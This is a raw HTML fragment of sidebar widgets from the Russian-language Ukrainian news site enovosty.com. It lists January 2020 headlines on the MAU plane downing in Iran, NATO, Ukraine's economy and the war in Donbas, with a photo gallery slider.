background: url(/wp-content/themes/eizvestia/img/blueline.jpg) repeat-x;
line-height: 9px;
margin: 2px 0 9px;
text-align: center;"><a href="https://enovosty.com/top-news"><span style="background-color: #fff;
font-size: 12px;
color: #326698;
text-transform: uppercase;
padding: 0 9px;">Топ-новости &nbsp;&nbsp;<i style="font-size: 11px;color: #666;font-style: normal;text-transform: none;">за 24 часа</i></span></a></p><ul id="slider"><li><ul class="tact"><li id="li0" style="width:210px;"><a href="https://enovosty.com/news_society/full/901-stoltenberg-sdelal-vazhnoe-zayavlenie-o-prisutstvii-nato-v-chernom-more-i-ukraine" title="Столтенберг сделал заявление о присутствии НАТО в Черном море и Украине"><img width="210" height="156" alt="Столтенберг сделал заявление о присутствии НАТО в Черном море и Украине" src="https://enovosty.com/wp-content/uploads/2020/01/73079.jpg"></a><a href="https://enovosty.com/news_society/full/901-stoltenberg-sdelal-vazhnoe-zayavlenie-o-prisutstvii-nato-v-chernom-more-i-ukraine" title="Столтенберг сделал заявление о присутствии НАТО в Черном море и Украине" class="name">Столтенберг сделал заявление о присутствии НАТО в Черном море и Украине <span>(252)</span></a></li></ul></li><li><ul class="tact"><li id="li1" style="width:210px;"><a href="https://enovosty.com/news-finance/full/901-v-mvf-prognoziruyut-dalnejshee-ukreplenie-grivny" title="В МВФ прогнозируют дальнейшее укрепление гривны"><img width="210" height="156" alt="В МВФ прогнозируют дальнейшее укрепление гривны" src="https://enovosty.com/wp-content/uploads/2020/01/959-1d47defbba83137cf2c7ac00f169e71e.jpg"></a><a href="https://enovosty.com/news-finance/full/901-v-mvf-prognoziruyut-dalnejshee-ukreplenie-grivny" title="В МВФ прогнозируют дальнейшее укрепление гривны" class="name">В МВФ прогнозируют дальнейшее укрепление гривны <span>(257)</span></a></li></ul></li><li><ul class="tact"><li id="li2" style="width:210px;"><a href="https://enovosty.com/news_society/full/901-voennosluzhashhie-desantniki-ispytali-ukrainskie-broneavtomobili-dozor-b-novator-varta-i-oncilla-m" title="Военнослужащие-десантники испытали украинские бронеавтомобили Дозор-Б, Новатор, Варта и Oncilla-M"><img width="210" height="156" alt="Военнослужащие-десантники испытали украинские бронеавтомобили Дозор-Б, Новатор, Варта и Oncilla-M" src="https://enovosty.com/wp-content/uploads/2020/01/original-2.jpg"></a><a href="https://enovosty.com/news_society/full/901-voennosluzhashhie-desantniki-ispytali-ukrainskie-broneavtomobili-dozor-b-novator-varta-i-oncilla-m" title="Военнослужащие-десантники испытали украинские бронеавтомобили Дозор-Б, Новатор, Варта и Oncilla-M" class="name">Военнослужащие-десантники испытали украинские бронеавтомобили "Дозор-Б", "Новатор", "Варта" и "Oncilla-M" <span>(385)</span></a></li></ul></li><li><ul class="tact"><li id="li3" style="width:210px;"><a href="https://enovosty.com/news_economy/full/901-kakix-reform-v-ekonomike-stoit-zhdat-v-2020-ukraincam" title="Каких реформ в экономике стоит ждать в 2020 украинцам"><img width="210" height="156" alt="Каких реформ в экономике стоит ждать в 2020 украинцам" src="https://enovosty.com/wp-content/uploads/2020/01/0c367f3f8f9545a86f51805378da08cf1253cd2b-e1578565977284.jpg"></a><a href="https://enovosty.com/news_economy/full/901-kakix-reform-v-ekonomike-stoit-zhdat-v-2020-ukraincam" title="Каких реформ в экономике стоит ждать в 2020 украинцам" class="name">Каких реформ в экономике стоит ждать в 2020 украинцам <span>(470)</span></a></li></ul></li><li><ul class="tact"><li id="li4" style="width:210px;"><a href="https://enovosty.com/news_politics/full/901-v-snbo-sdelali-gromkoe-zayavlenie-po-krusheniyu-boeing-737" title="В СНБО сделали громкое заявление по крушению Boeing 737"><img width="210" height="156" alt="В СНБО сделали громкое заявление по крушению Boeing 737" src="https://enovosty.com/wp-content/uploads/2020/01/original-1.jpg"></a><a href="https://enovosty.com/news_politics/full/901-v-snbo-sdelali-gromkoe-zayavlenie-po-krusheniyu-boeing-737" title="В СНБО сделали громкое заявление по крушению Boeing 737" class="name">В СНБО сделали громкое заявление по крушению Boeing 737 <span>(1273)</span></a></li></ul></li><li><ul class="tact"><li id="li5" style="width:210px;"><a href="https://enovosty.com/news_economy/full/901-stalo-izvestno-na-skolko-podesheveli-teplo-i-voda-dlya-kievlyan" title="Стало известно, на сколько подешевели тепло и вода для киевлян"><img width="210" height="156" alt="Стало известно, на сколько подешевели тепло и вода для киевлян" src="https://enovosty.com/wp-content/uploads/2020/01/361363.jpg"></a><a href="https://enovosty.com/news_economy/full/901-stalo-izvestno-na-skolko-podesheveli-teplo-i-voda-dlya-kievlyan" title="Стало известно, на сколько подешевели тепло и вода для киевлян" class="name">Стало известно, на сколько подешевели тепло и вода для киевлян <span>(283)</span></a></li></ul></li><li><ul class="tact"><li id="li6" style="width:210px;"><a href="https://enovosty.com/news_politics/full/901-vojna-na-donbasse-rossijskie-vojska-na-donbasse-podlo-udarili-po-vsu" title="Война на Донбассе: Российские войска подло ударили по ВСУ"><img width="210" height="156" alt="Война на Донбассе: Российские войска подло ударили по ВСУ" src="https://enovosty.com/wp-content/uploads/2020/01/d218c3e-war.jpg"></a><a href="https://enovosty.com/news_politics/full/901-vojna-na-donbasse-rossijskie-vojska-na-donbasse-podlo-udarili-po-vsu" title="Война на Донбассе: Российские войска подло ударили по ВСУ" class="name">Война на Донбассе: Российские войска подло ударили по ВСУ <span>(609)</span></a></li></ul></li><li><ul class="tact"><li id="li7" style="width:210px;"><a href="https://enovosty.com/news-auto/full/801-ukraincy-dolzhny-zaplatit-nalog-za-mashiny-za-chto-mogut-zabrat-i-komu-pridet-platezhka" title="Украинцы должны заплатить налог за машины: за что могут забрать и кому придет платежка"><img width="210" height="156" alt="Украинцы должны заплатить налог за машины: за что могут забрать и кому придет платежка" src="https://enovosty.com/wp-content/uploads/2020/01/volvo-xc60-d4-inscription-3.jpg"></a><a href="https://enovosty.com/news-auto/full/801-ukraincy-dolzhny-zaplatit-nalog-za-mashiny-za-chto-mogut-zabrat-i-komu-pridet-platezhka" title="Украинцы должны заплатить налог за машины: за что могут забрать и кому придет платежка" class="name">Украинцы должны заплатить налог за машины: за что могут забрать и кому придет платежка <span>(14459)</span></a></li></ul></li><li><ul class="tact"><li id="li8" style="width:210px;"><a href="https://enovosty.com/news_abroad/full/801-tramp-otstupil-gotovy-k-miru-video-zayavleniya" title="Трамп отступил: США готовы к миру (Видео заявления)"><img width="210" height="156" alt="Трамп отступил: США готовы к миру (Видео заявления)" src="https://enovosty.com/wp-content/uploads/2020/01/trump.jpg"></a><a href="https://enovosty.com/news_abroad/full/801-tramp-otstupil-gotovy-k-miru-video-zayavleniya" title="Трамп отступил: США готовы к миру (Видео заявления)" class="name">Трамп отступил: США готовы к миру (Видео заявления) <span>(916)</span></a></li></ul></li><li><ul class="tact"><li id="li9" style="width:210px;"><a href="https://enovosty.com/tehnologii-video/full/801-spacex-vyvela-na-orbitu-eshhe-60-sputnikov-globalnogo-interneta-starlink-video" title="SpaceX вывела на орбиту еще 60 спутников глобального интернета Starlink (ВИДЕО)"><img width="210" height="156" alt="SpaceX вывела на орбиту еще 60 спутников глобального интернета Starlink (ВИДЕО)" src="https://enovosty.com/wp-content/uploads/2020/01/1578389784-7494.jpg"></a><a href="https://enovosty.com/tehnologii-video/full/801-spacex-vyvela-na-orbitu-eshhe-60-sputnikov-globalnogo-interneta-starlink-video" title="SpaceX вывела на орбиту еще 60 спутников глобального интернета Starlink (ВИДЕО)" class="name">SpaceX вывела на орбиту еще 60 спутников глобального интернета Starlink (ВИДЕО) <span>(205)</span></a></li></ul></li><li><ul class="tact"><li id="li10" style="width:210px;"><a href="https://enovosty.com/news_kiev/full/801-zhitelyam-kieva-gotovyat-priyatnyj-syurpriz-s-kommunalkoj-podrobnosti" title="Жителям Киева готовят приятный сюрприз с коммуналкой: подробности"><img width="210" height="156" alt="Жителям Киева готовят приятный сюрприз с коммуналкой: подробности" src="https://enovosty.com/wp-content/uploads/2020/01/53_main.jpeg"></a><a href="https://enovosty.com/news_kiev/full/801-zhitelyam-kieva-gotovyat-priyatnyj-syurpriz-s-kommunalkoj-podrobnosti" title="Жителям Киева готовят приятный сюрприз с коммуналкой: подробности" class="name">Жителям Киева готовят приятный сюрприз с коммуналкой: подробности <span>(433)</span></a></li></ul></li><li><ul class="tact"><li id="li11" style="width:210px;"><a href="https://enovosty.com/news-auto/full/801-stalo-izvestno-kakie-trassy-v-ukraine-budut-remontirovat-v-2020-godu" title="Стало известно, какие трассы в Украине будут ремонтировать в 2020 году"><img width="210" height="156" alt="Стало известно, какие трассы в Украине будут ремонтировать в 2020 году" src="https://enovosty.com/wp-content/uploads/2020/01/5c939e59c6143-e1578476658538.jpg"></a><a href="https://enovosty.com/news-auto/full/801-stalo-izvestno-kakie-trassy-v-ukraine-budut-remontirovat-v-2020-godu" title="Стало известно, какие трассы в Украине будут ремонтировать в 2020 году" class="name">Стало известно, какие трассы в Украине будут ремонтировать в 2020 году <span>(3400)</span></a></li></ul></li><li><ul class="tact"><li id="li12" style="width:210px;"><a href="https://enovosty.com/news_economy/full/801-vezd-v-es-stanet-platnym-i-bolee-slozhnym-chto-i-kogda-izmenitsya-dlya-ukraincev" title="Въезд в ЕС станет платным и более сложным. Что и когда изменится для украинцев"><img width="210" height="156" alt="Въезд в ЕС станет платным и более сложным. Что и когда изменится для украинцев" src="https://enovosty.com/wp-content/uploads/2020/01/es.jpg"></a><a href="https://enovosty.com/news_economy/full/801-vezd-v-es-stanet-platnym-i-bolee-slozhnym-chto-i-kogda-izmenitsya-dlya-ukraincev" title="Въезд в ЕС станет платным и более сложным. Что и когда изменится для украинцев" class="name">Въезд в ЕС станет платным и более сложным. Что и когда изменится для украинцев <span>(1005)</span></a></li></ul></li><li><ul class="tact"><li id="li13" style="width:210px;"><a href="https://enovosty.com/news_politics/full/801-v-aviakatastrofe-v-irane-razbilis-15-ukraincev-istochniki-rasskazali-kto-byl-na-bortu-samolyota" title="В авиакатастрофе в Иране разбились 15 украинцев. Источники рассказали, кто был на борту самолёта"><img width="210" height="156" alt="В авиакатастрофе в Иране разбились 15 украинцев. Источники рассказали, кто был на борту самолёта" src="https://enovosty.com/wp-content/uploads/2020/01/iran-samolet-upal1.jpg"></a><a href="https://enovosty.com/news_politics/full/801-v-aviakatastrofe-v-irane-razbilis-15-ukraincev-istochniki-rasskazali-kto-byl-na-bortu-samolyota" title="В авиакатастрофе в Иране разбились 15 украинцев. Источники рассказали, кто был на борту самолёта" class="name">В авиакатастрофе в Иране разбились 15 украинцев. Источники рассказали, кто был на борту самолёта <span>(1479)</span></a></li></ul></li><li><ul class="tact"><li id="li14" style="width:210px;"><a href="https://enovosty.com/news_abroad/full/801-iran-brosaet-gromkie-ugrozy-vs-izrailya-priveli-v-polnuyu-gotovnost" title="Иран бросает громкие угрозы: ВС Израиля привели в полную готовность"><img width="210" height="156" alt="Иран бросает громкие угрозы: ВС Израиля привели в полную готовность" src="https://enovosty.com/wp-content/uploads/2020/01/iran-threatens-israel.jpg"></a><a href="https://enovosty.com/news_abroad/full/801-iran-brosaet-gromkie-ugrozy-vs-izrailya-priveli-v-polnuyu-gotovnost" title="Иран бросает громкие угрозы: ВС Израиля привели в полную готовность" class="name">Иран бросает громкие угрозы: ВС Израиля привели в полную готовность <span>(1722)</span></a></li></ul></li></ul></div><div class="wiget simple_pr" id="photoPromo" style="background: #ffe3c8;"><div class="caption"><p style=" text-transform: uppercase; font-weight: 700; font-family: arial,verdana,tahoma; margin: 0; display: block; float: left; color: #fff; padding: 0 5px 0 4px; background-color: #f93; height: 17px; font-size: 12px;
"><a style="color: #fff;" href="https://enovosty.com/photo-nedeli">Фото недели</a></p></div><div class="topnews_single slide gallery2" style="width: 182px; height: 230px; padding: 10px 10px 0; background: #fff; margin: 10px;"><ul id="slider_gallery2"><li><ul class="tact"><li id="li0" style="width:182px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=535&pid=11776"><img width="182" height="170" src="https://enovosty.com/wp-content/gallery/yapon1/thumbs/thumbs_06.jpg" alt="Невероятно красивая зима в Японии"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=535&pid=11776" title="Невероятно красивая зима в Японии" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Невероятно красивая зима в Японии</a></li></ul></li><li><ul class="tact"><li id="li1" style="width:182px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=534&pid=11763"><img width="182" height="170" src="https://enovosty.com/wp-content/gallery/boroda/thumbs/thumbs_13.jpg" alt="Как борода может изменить мужчину до неузнаваемости"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=534&pid=11763" title="Как борода может изменить мужчину до неузнаваемости" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Как борода может изменить мужчину до неузнаваемости</a></li></ul></li><li><ul class="tact"><li id="li2" style="width:182px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=533&pid=11730"><img width="182" height="170" src="https://enovosty.com/wp-content/gallery/znamenitost_1/thumbs/thumbs_03.jpg" alt="Как знаменитости путешествовали в 70-х"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=533&pid=11730" title="Как знаменитости путешествовали в 70-х" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Как знаменитости путешествовали в 70-х</a></li></ul></li><li><ul class="tact"><li id="li3" style="width:182px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=532&pid=11721"><img width="182" height="170" src="https://enovosty.com/wp-content/gallery/tochki/thumbs/thumbs_capes04.jpg" alt="10 самых крайних точек мира"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=532&pid=11721" title="10 самых крайних точек мира" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">10 самых крайних точек мира</a></li></ul></li></ul></div> <div class="cls"></div> <a href="https://enovosty.com/photo-nedeli" class="readMore">Все фото &raquo;</a></div><script>jQuery(document).ready(function($){$('#slider_gallery2').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><style>.topnews_single.gallery2 div.anythingSlider-minimalist-round span.arrow{height:170px}</style><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption" style=""><p style="font-size: 12px; height: 17px; color: #fff; background-color: #346796; padding: 0 5px; display: inline; text-transform: uppercase; font-weight: 700;font-family: arial,verdana,tahoma;">Новости общества</p></div><div class='cls'></div><span class='news_date'>09.01.2020 г.</span><br /><div class="post_news"><span id="post-4789467"><span class="postDate">21:59</span><a class="postTitle" href="https://enovosty.com/news_society/full/901-samolet-mau-sbil-iz-zrk-tor-korpus-strazhej-islamskoj-revolyucii-issledovanie">Самолет МАУ сбил из ЗРК "Тор" Корпус стражей Исламской революции – исследование</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4789465"><span class="postDate">21:47</span><a class="postTitle" href="https://enovosty.com/news_society/full/901-stoltenberg-sdelal-vazhnoe-zayavlenie-o-prisutstvii-nato-v-chernom-more-i-ukraine">Столтенберг сделал заявление о присутствии НАТО в Черном море и Украине</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4789461"><span class="postDate">21:28</span><a class="postTitle" href="https://enovosty.com/news_society/full/901-fsb-vedet-gibridnuyu-vojnu-v-socsetyax">ФСБ ведет гибридную войну в соцсетях</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4789440"><span class="postDate">20:47</span><a class="postTitle" href="https://enovosty.com/news_society/full/901-versiya-terakta-na-bortu-boinga-ili-vzryva-zenitnoj-rakety-vesma-veroyatna-istochnik">Версия теракта на борту "Боинга" или взрыва зенитной ракеты весьма вероятна - источник</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4789439"><span class="postDate">20:19</span><a class="postTitle" href="https://enovosty.com/news_society/full/901-aleksandr-musienko-rasskazal-o-vozmozhnosti-krusheniya-ukrainskogo-samoleta-mau-v-rezultate-vneshnego-vmeshatelstva">Александр Мусиенко рассказал о возможности крушения самолета МАУ из-за внешнего вмешательства</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4789441"><span class="postDate">19:53</span><a class="postTitle" href="https://enovosty.com/news_society/full/901-papa-rimskij-ocenil-polozhitelnuyu-dinamiku-v-ukraine">Папа Римский оценил "положительную динамику" в Украине</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4789426"><span class="postDate">19:16</span><a class="postTitle" href="https://enovosty.com/news_society/full/901-tramp-sdelal-gromkoe-zayavlenii-o-krushenii-samoleta-mau-v-irane">Трамп сделал громкое заявление о крушении самолета МАУ в Иране</a><br /><div class="postFields"></div></span></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/news_society">Все новости общества</a></div><div class="wiget simple_line analitika"> <div class="caption"><p style="text-transform: uppercase;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;"><a href="https://enovosty.com/articles">Аналитика</a></p></div><div class="block"><div class="info"><span class="postDate">09.01.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/901-itogi-dnya-zakrytye-versii-krusheniya-samoleta-voennaya-moshh-v-chernom-more-i-cenovye-tormoza">Итоги дня: "Закрытые" версии крушения самолета, военная мощь в Черном море и ценовые рекорды</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/901-itogi-dnya-zakrytye-versii-krusheniya-samoleta-voennaya-moshh-v-chernom-more-i-cenovye-tormoza"><img width="230" alt="Итоги дня: Закрытые версии крушения самолета, военная мощь в Черном море и ценовые рекорды" src="/wp-content/uploads/2020/01/5319727.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/901-itogi-dnya-zakrytye-versii-krusheniya-samoleta-voennaya-moshh-v-chernom-more-i-cenovye-tormoza">В СНБО рассказали о возможных причинах крушения украинского самолёта в Иране, Израиль и Украина нашли компромисс по Бандере, а рост цен замедлился более ...</a></span></div><div class="block"><div class="info"><span class="postDate">09.01.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/901-vojna-poka-otmenyaetsya-shtaty-dali-zadnyuyu">Война пока отменяется: Штаты дали заднюю на реках вавилонских</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/901-vojna-poka-otmenyaetsya-shtaty-dali-zadnyuyu"><img width="230" alt="Война пока отменяется: Штаты дали заднюю на реках вавилонских" src="/wp-content/uploads/2020/01/cover_tramp.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/901-vojna-poka-otmenyaetsya-shtaty-dali-zadnyuyu">Пребывая, очевидно, в празднично-новогоднем угаре и отдав приказ о ликвидации иранского генерала Касема Сулеймани, Дональд Трамп совершил абсолютно безрассудное ...</a></span></div><div class="block"><div class="info"><span class="postDate">08.01.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/801-itogi-dnya-katastrofa-samoleta-mau-v-irane-gnev-trampa-i-finansovaya-revolyuciya">Итоги дня: Катастрофа самолета МАУ в Иране, гнев Трампа и "историческая денежная революция"</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/801-itogi-dnya-katastrofa-samoleta-mau-v-irane-gnev-trampa-i-finansovaya-revolyuciya"><img width="230" alt="Итоги дня: Катастрофа самолета МАУ в Иране, гнев Трампа и историческая денежная революция" src="/wp-content/uploads/2020/01/330169w540zc0-e1578504793159.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/801-itogi-dnya-katastrofa-samoleta-mau-v-irane-gnev-trampa-i-finansovaya-revolyuciya">Украинский самолёт разбился вскоре после вылета из аэропорта Тегерана, американский президент Дональд Трамп сделал экстренное обращение к нации после ...</a></span></div></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption"><p style="font-weight: 700; font-family: arial,verdana,tahoma; font-size: 12px; text-transform: uppercase; margin: 0; padding: 0; text-align: left;height: 17px;"><a href="https://enovosty.com/news/">Последние новости</a></p></div><div class='cls'></div><span class='news_date'>10.01.2020 г.</span><br /><div class="post_news"> <span id="post-4789459"> <span class="postDate">00:20</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1001-iz-muzeya-voskovyx-figur-madam-tyusso-ubrali-figury-princa-garri-i-megan-markl">Из музея восковых фигур мадам Тюссо убрали фигуры принца Гарри и Меган Маркл</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>09.01.2020 г.</span><br /><div class="post_news"> <span id="post-4789472"> <span class="postDate">23:18</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/901-foto-spasennoj-iz-pozhara-koaly-obnimayushhej-novorozhdennogo-detenysha-obletelo-mir-foto">Фото спасенной из пожара коалы, обнимающей новорожденного детеныша облетело мир (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789477"> <span class="postDate">22:41</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/901-dannye-kanadskoj-razvedki-ukrainskij-samolet-sbila-raketa-zemlya-vozdux-tryudo">Данные канадской разведки: Украинский самолет сбила ракета "земля-воздух" - Трюдо</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789467"> <span class="postDate">21:59</span> <a class="postTitle" href="https://enovosty.com/news_society/full/901-samolet-mau-sbil-iz-zrk-tor-korpus-strazhej-islamskoj-revolyucii-issledovanie">Самолет МАУ сбил из ЗРК "Тор" Корпус стражей Исламской революции – исследование</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789465"> <span class="postDate">21:47</span> <a class="postTitle" href="https://enovosty.com/news_society/full/901-stoltenberg-sdelal-vazhnoe-zayavlenie-o-prisutstvii-nato-v-chernom-more-i-ukraine">Столтенберг сделал заявление о присутствии НАТО в Черном море и Украине</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789461"> <span class="postDate">21:28</span> <a class="postTitle" href="https://enovosty.com/news_society/full/901-fsb-vedet-gibridnuyu-vojnu-v-socsetyax">ФСБ ведет гибридную войну в соцсетях</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789451"> <span class="postDate">21:05</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/901-associated-press-mirovye-fondovye-indeksy-rastut-na-fone-oslableniya-napryazhennosti-mezhdu-ssha-i-iranom">Associated Press: Мировые фондовые индексы растут на фоне ослабления напряженности между США и Ираном</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789440"> <span class="postDate">20:47</span> <a class="postTitle" href="https://enovosty.com/news_society/full/901-versiya-terakta-na-bortu-boinga-ili-vzryva-zenitnoj-rakety-vesma-veroyatna-istochnik">Версия теракта на борту "Боинга" или взрыва зенитной ракеты весьма вероятна - источник</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789447"> <span class="postDate">20:32</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/901-v-kieve-obnaruzhili-razgulivayushhego-po-zasnezhennym-ulicam-losya">В Киеве обнаружили разгуливающего по заснеженным улицам лося</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789439"> <span class="postDate">20:19</span> <a class="postTitle" href="https://enovosty.com/news_society/full/901-aleksandr-musienko-rasskazal-o-vozmozhnosti-krusheniya-ukrainskogo-samoleta-mau-v-rezultate-vneshnego-vmeshatelstva">Александр Мусиенко рассказал о возможности крушения самолета МАУ из-за внешнего вмешательства</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789441"> <span class="postDate">19:53</span> <a class="postTitle" href="https://enovosty.com/news_society/full/901-papa-rimskij-ocenil-polozhitelnuyu-dinamiku-v-ukraine">Папа Римский оценил "положительную динамику" в Украине</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789432"> <span class="postDate">19:46</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/901-v-stolice-pyanyj-voditel-na-audi-vexal-v-zdanie-filarmonii">В столице пьяный водитель на Audi въехал в здание филармонии</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789426"> <span class="postDate">19:16</span> <a class="postTitle" href="https://enovosty.com/news_society/full/901-tramp-sdelal-gromkoe-zayavlenii-o-krushenii-samoleta-mau-v-irane">Трамп сделал громкое заявление о крушении самолета МАУ в Иране</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789422"> <span class="postDate">18:59</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/901-situaciya-katastroficheskaya-poyavilis-novye-dannye-o-masshtabnyx-pozharax-v-avstralii">Ситуация катастрофическая: появились новые данные о масштабных пожарах в Австралии</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789416"> <span class="postDate">18:43</span> <a class="postTitle" href="https://enovosty.com/news_society/full/901-v-nacpolicii-rasskazali-kak-neobxodimo-zabotitsya-o-bezopasnosti-svoego-avto">В Нацполиции рассказали, как необходимо заботится о безопасности своего авто</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789411"> <span class="postDate">18:18</span> <a class="postTitle" href="https://enovosty.com/news_society/full/901-na-donbasse-proveli-trenirovku-desantnikov-na-bmp-1">На Донбассе провели тренировку десантников на БМП-1</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789408"> <span class="postDate">17:58</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/901-v-ukraine-skoro-poyavyatsya-zaryadnye-stancii-tesla">В Украине скоро появятся зарядные станции Tesla</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789405"> <span class="postDate">17:42</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/901-v-abxazii-vspyxnul-protest-lyudi-vzyali-shturmom-administraciyu-prezidenta">В Абхазии вспыхнул протест: люди взяли штурмом "администрацию президента" (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789403"> <span class="postDate">17:29</span> <a class="postTitle" href="https://enovosty.com/news-finance/full/901-v-ukraine-rost-cen-zamedlilsya-do-shestiletnego-minimuma">В Украине рост цен замедлился до шестилетнего минимума</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789393"> <span class="postDate">17:16</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/901-uchenye-upotreblenie-zelenogo-chaya-prodlevaet-zhizn">Ученые: Употребление зеленого чая продлевает жизнь</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789235"> <span class="postDate">17:15</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/901-kak-vyglyadel-iran-pered-revolyuciej-1979-goda-prevrativshej-stranu-v-islamskuyu-respubliku-foto">Как выглядел Иран перед революцией 1979 года, превратившей страну в исламскую республику (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789398"> <span class="postDate">16:57</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/901-v-rossii-vspyxnul-masshtabnyj-pozhar-na-neftyanom-zavode-video">В России вспыхнул масштабный пожар на нефтяном заводе (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789394"> <span class="postDate">16:42</span> <a class="postTitle" href="https://enovosty.com/news-finance/full/901-v-mvf-prognoziruyut-dalnejshee-ukreplenie-grivny">В МВФ прогнозируют дальнейшее укрепление гривны</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789387"> <span class="postDate">16:30</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/901-iskusstvennyj-intellekt-pomozhet-warner-bros-snimat-filmy">Искусственный интеллект поможет Warner Bros снимать фильмы</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789388"> <span class="postDate">16:16</span> <a class="postTitle" href="https://enovosty.com/news_society/full/901-voennosluzhashhie-desantniki-ispytali-ukrainskie-broneavtomobili-dozor-b-novator-varta-i-oncilla-m">Военнослужащие-десантники испытали украинские бронеавтомобили "Дозор-Б", "Новатор", "Варта" и "Oncilla-M"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789385"> <span class="postDate">15:57</span> <a class="postTitle" href="https://enovosty.com/news_society/full/901-pravoslavnaya-cerkov-ukrainy-zapustit-prilozhenie-dlya-smartfonov-moya-cerkov">Православная церковь Украины запустит приложение для смартфонов «Моя церковь»</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789377"> <span class="postDate">15:49</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/901-hyundai-poxvastalas-konceptom-elektricheskogo-bespilotnika">Hyundai похвасталась концептом электрического беспилотника</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4789379"> <span class="postDate">15:30</span> <a class="postTitle" href="https://enovosty.com/news_society/full/901-v-irane-obnaruzheny-dokazatelstva-popadaniya-rakety-9m331-v-ukrainskij-passazhirskij-samolet">В Иране обнаружены доказательства попадания ракеты 9М331 в украинский пассажирский 